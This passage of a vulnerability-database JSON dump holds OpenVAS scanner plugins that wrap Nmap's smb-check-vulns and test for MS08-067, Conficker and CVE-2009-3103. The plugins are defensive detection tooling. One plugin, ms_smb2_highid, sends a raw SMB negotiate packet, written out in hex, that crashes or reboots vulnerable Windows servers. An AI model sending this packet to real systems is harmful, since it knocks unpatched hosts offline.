02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nWARNING: These checks are dangerous, and are very likely to bring down a server. These should not\nbe run in a production environment unless you (and, more importantly, the business) understand the\nrisks!\n\nAs a system administrator, performing these kinds of checks is crucial, because a lot more damage\ncan be done by a worm or a hacker using this vulnerability than by a scanner. Penetration testers,\non the other hand, might not want to use this script -- crashing services is not generally a good\nway of sneaking through a network.\n\nIf you set the script parameter 'unsafe', then scripts will run that are almost (or\ntotally) guaranteed to crash a vulnerable system; do NOT specify 'unsafe' in a production\nenvironment! And that isn't to say that non-unsafe scripts will not crash a system, they're just\nless likely to.\n\nIf you set the script parameter 'safe', then script will run that rarely or never crash a\nvulnerable system. No promises, though.\n\nMS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that can allow\nremote code execution. Checking for MS08-067 is very dangerous, as the check is likely to crash\nsystems. On a fairly wide scan conducted by Brandon Enright, we determined that on average, a\nvulnerable system is more likely to crash than to survive the check. Out of 82 vulnerable systems,\n\n\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\n\n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n\n- 'negotiate': [default] Use signatures if server supports them. \n\n- 'ignore': Never check server signatures. Not recommended. \n\n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\n\n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)\";\n\nif(description)\n{\n script_id(803571);\n script_version(\"$Revision: 7000 $\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-24 13:51:46 +0200 (Thu, 24 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-28 19:01:00 +0530 (Thu, 28 Feb 2013)\");\n script_name(\"Nmap NSE 6.01: smb-check-vulns\");\n\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n\n script_add_preference(name:\"smbport\", value:\"\", type:\"entry\");\n script_add_preference(name:\"randomseed\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbbasic\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbsign\", value:\"\", type:\"entry\");\n script_add_preference(name:\"safe\", value:\"\", type:\"entry\");\n script_add_preference(name:\"unsafe\", value:\"\", type:\"entry\");\n\n script_dependencies(\"toolcheck.nasl\");\n script_mandatory_keys(\"Tools/Present/nmap6.01\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse\");\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n# The corresponding NSE script doesn't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\n\n# Get the preferences\ni = 0;\n\n## Get SMB Port\nport = script_get_preference(\"smbport :\");\nif (port !~ '^[0-9]+$')\n{\n port = 445;\n}\n\npref = script_get_preference(\"smbport\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'smbport', '=', pref, '\"');\n}\npref = script_get_preference(\"randomseed\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'randomseed', '=', pref, '\"');\n}\npref = script_get_preference(\"smbbasic\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'smbbasic', '=', pref, '\"');\n}\npref = script_get_preference(\"smbsign\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'smbsign', '=', pref, '\"');\n}\npref = script_get_preference(\"safe\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'safe', '=', pref, '\"');\n}\npref = script_get_preference(\"unsafe\");\nif (!isnull(pref) && pref != \"\") {\n args[i++] = string('\"', 'unsafe', '=', pref, '\"');\n}\n\nargv = make_list(\"nmap\", \"--script=smb-check-vulns.nse\", \"-p\", port,\n get_host_ip());\n\nif(i > 0)\n{\n scriptArgs= \"--script-args=\";\n foreach arg(args) {\n scriptArgs += arg + \",\";\n }\n argv = make_list(argv,scriptArgs);\n}\n\n## Run nmap and Get the Result\nres = pread(cmd: \"nmap\", argv: argv);\n\nif(res)\n{\n foreach line (split(res))\n {\n if(ereg(pattern:\"^\\|\",string:line)) {\n result += substr(chomp(line),2) + '\\n';\n }\n\n error = eregmatch(string:line, pattern:\"^nmap: (.*)$\");\n if (error) {\n msg = string('Nmap command failed with following error message:\\n', line);\n log_message(data : msg, port:port);\n }\n }\n\n if(\"smb-check-vulns\" >< result) {\n msg = string('Result found by Nmap Security Scanner (smb-check-vulns.nse) ',\n 'http://nmap.org:\\n\\n', result);\n security_message(data : msg, port:port);\n }\n}\nelse\n{\n msg = string('Nmap command failed entirely:\\n', 'nmap ', argv);\n log_message(data: msg, port:port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-04T14:21:56", "references": [], "pluginID": "801287", "description": "This script attempts to check the following vulnerabilities:\n - MS08-067, a Windows RPC vulnerability\n - Conficker, an infection by the Conficker worm\n - Unnamed regsvc DoS\n - SMBv2 exploit (CVE-2009-3103)\n\n This is a wrapper on the Nmap Security Scanner's (http://nmap.org) smb-check-vulns.nse.", "edition": 2, "reporter": "NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH", "published": "2010-09-23T00:00:00", "title": "Nmap NSE: SMB Check Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Nmap NSE", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3103"], "modified": "2017-08-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=801287", "id": "OPENVAS:801287", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_smb_check_vulns.nasl 7006 2017-08-25 11:51:20Z teissa $\n#\n# Wrapper for Nmap SMB Check Vulnerabilities NSE script.\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# NASL-Wrapper: Copyright (c) 2010 Greenbone Networks GmbH (http://www.greenbone.net)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"This script attempts to check the following vulnerabilities:\n - MS08-067, a Windows RPC vulnerability\n - Conficker, an infection by the Conficker worm\n - Unnamed regsvc DoS\n - SMBv2 exploit (CVE-2009-3103)\n\n This is a wrapper on the Nmap Security Scanner's (http://nmap.org) smb-check-vulns.nse.\";\n\n\nif(description)\n{\n script_id(801287);\n script_version(\"$Revision: 7006 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-25 13:51:20 +0200 (Fri, 25 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-23 08:22:30 +0200 (Thu, 23 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Nmap NSE: SMB Check Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n script_add_preference(name: \"safe :\", value: \"no\",type: \"checkbox\");\n script_add_preference(name: \"unsafe :\", value: \"no\",type: \"checkbox\");\n script_add_preference(name: \"smbusername :\", value: \"\",type: \"entry\");\n script_add_preference(name: \"smbpassword :\", value: \"\",type: \"entry\");\n script_add_preference(name: \"smbdomain :\", value: \"\",type: \"entry\");\n script_add_preference(name: \"smbport :\", value: \"\",type: \"entry\");\n script_add_preference(name: \"smbtype :\", value: \"\",type: \"entry\");\n script_add_preference(name: \"smbnoguest :\", value: \"\",type: \"entry\");\n script_add_preference(name: \"smbhash :\", value: \"\",type: \"entry\");\n script_add_preference(name: \"smbbasic :\", value: \"\",type: \"entry\");\n script_add_preference(name: \"smbsign :\", value: \"\",type: \"entry\");\n script_add_preference(name: \"randomseed :\", value: \"\",type: \"entry\");\n\n script_mandatory_keys(\"Tools/Present/nmap\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse\");\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\n## Check for Required Keys\nif((! get_kb_item(\"Tools/Present/nmap5.21\") &&\n ! get_kb_item(\"Tools/Present/nmap5.51\")) ||\n ! get_kb_item(\"Tools/Launch/nmap_nse\")) {\n exit(0);\n}\n\n## Get SMB Port\nport = script_get_preference(\"smbport :\");\nif (port !~ '^[0-9]+$')\n{\n port = 445;\n}\n\nargv = make_list(\"nmap\", \"--script=smb-check-vulns.nse\", \"-p\", port,\n get_host_ip());\n\n## Get the preferences\ni = 0;\nif( \"yes\" == script_get_preference(\"safe :\")){\n args[i++] = \"safe=1\";\n}\n\nif( \"yes\" == script_get_preference(\"unsafe :\")){\n args[i++] = \"unsafe=1\";\n}\n\nif( pref = script_get_preference(\"smbusername :\")){\n args[i++] = \"smbusername=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbpassword :\")){\n args[i++] = \"smbpassword=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbdomain :\")){\n args[i++] = \"smbdomain=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbtype :\")){\n args[i++] = \"smbtype=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbnoguest :\")){\n args[i++] = \"smbnoguest=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbhash :\")){\n args[i++] = \"smbhash=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbbasic :\")){\n args[i++] = \"smbbasic=\"+pref;\n}\n\nif( pref = script_get_preference(\"smbsign :\")){\n args[i++] = \"smbsign=\"+pref;\n}\n\nif( pref = script_get_preference(\"randomseed :\")){\n args[i++] = \"randomseed=\"+pref;\n}\n\nif(i > 0)\n{\n scriptArgs= \"--script-args=\";\n foreach arg(args) {\n scriptArgs += arg + \",\";\n }\n argv = make_list(argv,scriptArgs);\n}\n\n## Run nmap and Get the result\nres = pread(cmd: \"nmap\", argv: argv);\nif(res)\n{\n foreach line (split(res))\n {\n if(ereg(pattern:\"^\\|\",string:line)) {\n result += substr(chomp(line),2) + '\\n';\n }\n\n error = eregmatch(string:line, pattern:\"^nmap: (.*)$\");\n if (error) {\n msg = string('Nmap command failed with following error message:\\n', line);\n log_message(data : msg, port:port);\n }\n }\n\n if(\"smb-check-vulns\" >< result) {\n msg = string('Result found by Nmap Security Scanner (smb-check-vulns.nse) ',\n 'http://nmap.org:\\n\\n', result);\n security_message(data : msg, port:port);\n\n if (\"INFECTED\" >< result)\n set_kb_item(name:\"conficker/nse\", value:result);\n }\n}\nelse\n{\n msg = string('Nmap command failed entirely:\\n');\n log_message(data : msg, port:port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:19", "references": ["http://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1", "http://www.microsoft.com/windows/products/windowsvista/default.mspx", "http://www.microsoft.com/technet/security/advisory/975497.mspx", "http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx", "http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html", "http://www.kb.cert.org/vuls/id/135940", "http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx", "http://www.microsoft.com/windows/windows-7/", "http://blog.48bits.com/?p=510#more-510", "http://www.securityfocus.com/archive/1/506327", "http://www.securityfocus.com/archive/1/506300", "http://www.securityfocus.com/bid/36299"], "pluginID": "100283", "description": "Microsoft Windows is prone to a remote code-execution vulnerability\nwhen processing the protocol headers for the Server Message Block\n(SMB) Negotiate Protocol Request.\n\nNOTE: Reportedly, for this issue to be exploitable, file sharing must\n be enabled.\n\nAn attacker can exploit this issue to execute code with SYSTEM-level\nprivileges; failed exploit attempts will likely cause denial-of-\nservice conditions.\n\nWindows 7 RC, Vista and 2008 Server are vulnerable; other versions may\nalso be affected.\n\nNOTE: Reportedly, Windows XP and 2000 are not affected.\n\nUPDATE (September 9, 2009): Symantec has confirmed the issue on\nWindows Vista SP1 and Windows Server 2008.", "edition": 1, "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-10-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability", "type": "openvas", "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3103"], "modified": "2017-01-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=100283", "id": "OPENVAS:100283", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ms_smb2_highid.nasl 5002 2017-01-13 10:17:13Z teissa $\n#\n# Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Microsoft Windows is prone to a remote code-execution vulnerability\nwhen processing the protocol headers for the Server Message Block\n(SMB) Negotiate Protocol Request.\n\nNOTE: Reportedly, for this issue to be exploitable, file sharing must\n be enabled.\n\nAn attacker can exploit this issue to execute code with SYSTEM-level\nprivileges; failed exploit attempts will likely cause denial-of-\nservice conditions.\n\nWindows 7 RC, Vista and 2008 Server are vulnerable; other versions may\nalso be affected.\n\nNOTE: Reportedly, Windows XP and 2000 are not affected.\n\nUPDATE (September 9, 2009): Symantec has confirmed the issue on\nWindows Vista SP1 and Windows Server 2008.\";\n\n\nif (description)\n{\n script_id(100283);\n script_version(\"$Revision: 5002 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-13 11:17:13 +0100 (Fri, 13 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-01 18:57:31 +0200 (Thu, 01 Oct 2009)\");\n script_bugtraq_id(36299);\n script_cve_id(\"CVE-2009-3103\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability\");\n\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_KILL_HOST);\n script_family(\"Windows\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(445);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/36299\");\n script_xref(name : \"URL\" , value : \"http://blog.48bits.com/?p=510#more-510\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/advisory/975497.mspx\");\n script_xref(name : \"URL\" , value : \"http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/windows/windows-7/\");\n script_xref(name : \"URL\" , value : \"http://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1\");\n script_xref(name : \"URL\" , value : \"http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/windows/products/windowsvista/default.mspx\");\n script_xref(name : \"URL\" , value : \"http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/506300\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/506327\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/135940\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\n\nif(safe_checks())exit(0);\n\nport = 445;\nif(!get_port_state(port))exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc)exit(0);\n\ndata = raw_string(0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,0x18,0x53,0xc8,\n 0x00,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xfe,\n 0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,\n 0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02,\n 0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x64,0x6f,\n 0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x75,0x70,\n 0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,\n 0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4e,0x54,\n 0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x32,0x2e,\n 0x30,0x30,0x32,0x00); # Tested against 2008 Server. A vulnerable Server doing a reboot. I'm not happy with that, but a the moment i have no idea how to detect this vulnerability without exploiting it.\n\nsend(socket: soc, data: data);\nclose(soc);\n\nsleep(2);\n\nsoc1 = open_sock_tcp(port);\n\n if(!soc1) {\n security_message(port:port);\n exit(0);\n } else {\n close(soc1);\n }\n\nexit(0);\n\n \n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-29T12:32:19", "references": [], "pluginID": "1361412562310104116", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nSYNTAX:\n\nsmbport: Override the default port choice. If ", "edition": 5, "reporter": "NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH", "published": "2011-06-01T00:00:00", "title": "Nmap NSE net: smb-check-vulns", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Nmap NSE net", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3103"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310104116", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104116", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_smb_check_vulns_net.nasl 12117 2018-10-26 10:50:36Z cfischer $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.104116\");\n script_version(\"$Revision: 12117 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 12:50:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Nmap NSE net: smb-check-vulns\");\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n script_add_preference(name:\"smbport\", value:\"\", type:\"entry\");\n script_add_preference(name:\"randomseed\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbbasic\", value:\"\", type:\"entry\");\n script_add_preference(name:\"smbsign\", value:\"\", type:\"entry\");\n script_add_preference(name:\"safe\", value:\"\", type:\"entry\");\n script_add_preference(name:\"unsafe\", value:\"\", type:\"entry\");\n\n script_tag(name:\"summary\", value:\"Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something.\n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated.\n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'.\nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for\nenumerating users if you turn on basic authentication.\n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign\npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n - 'force': Always check server signatures, even if server says it doesn't support them (will\nprobably fail, but is technically more secure).\n\n - 'negotiate': [default] Use signatures if server supports them.\n\n - 'ignore': Never check server signatures. Not recommended.\n\n - 'disable': Don't send signatures, at all, and don't check the server's. not recommended.\nMore information on signatures can be found in 'smbauth.lua'.\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe.\n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n exit(0);\n}\n\ninclude(\"nmap.inc\");\n\n# The corresponding NSE script doesn't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n argv = make_array();\n\n pref = script_get_preference(\"smbport\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"smbport\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"randomseed\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"randomseed\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"smbbasic\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"smbbasic\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"smbsign\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"smbsign\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"safe\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"safe\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"unsafe\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"unsafe\"] = string('\"', pref, '\"');\n }\n nmap_nse_register(script:\"smb-check-vulns\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"smb-check-vulns\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (smb-check-vulns.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:26", "references": [], "pluginID": "104116", "description": "Checks for vulnerabilities: * MS08-067, a Windows RPC vulnerability * Conficker, an infection by\nthe Conficker worm * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in\nWindows 2000 * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) * MS06-025, a\nWindows Ras RPC service vulnerability * MS07-029, a Windows Dns Server RPC service vulnerability\n\nSYNTAX:\n\nsmbport: Override the default port choice. If 'smbport' is open, it's used. It's assumed\nto be the same protocol as port 445, not port 139. Since it probably isn't possible to change\nWindows' ports normally, this is mostly useful if you're bouncing through a relay or something. \n\nrandomseed: Set to a value to change the filenames/service names that are randomly generated. \n\nsmbbasic: Forces the authentication to use basic security, as opposed to 'extended security'. \nAgainst most modern systems, extended security should work, but there may be cases\nwhere you want to force basic. There's a chance that you'll get better results for \nenumerating users if you turn on basic authentication. \n\nsmbsign: Controls whether or not server signatures are checked in SMB packets. By default, on Windows,\nserver signatures aren't enabled or required. By default, this library will always sign \npackets if it knows how, and will check signatures if the server says to. Possible values are:\n\n- 'force': Always check server signatures, even if server says it doesn't support them (will \nprobably fail, but is technically more secure). \n- 'negotiate': [default] Use signatures if server supports them. \n- 'ignore': Never check server signatures. Not recommended. \n- 'disable': Don't send signatures, at all, and don't check the server's. not recommended. \nMore information on signatures can be found in 'smbauth.lua'.\n\nsafe: If set, this script will only run checks that are known (or at\nleast suspected) to be safe. \n\nunsafe: If set, this script will run checks that, if the system isn't\npatched, are basically guaranteed to crash something. Remember that\nnon-unsafe checks aren't necessarily safe either)", "edition": 1, "reporter": "NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH", "published": "2011-06-01T00:00:00", "title": "Nmap NSE net: smb-check-vulns", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Nmap NSE net", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3103"], "modified": "2017-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=104116", "id": "OPENVAS:104116", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_smb_check_vulns_net.nasl 5499 2017-03-06 13:06:09Z teissa $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free 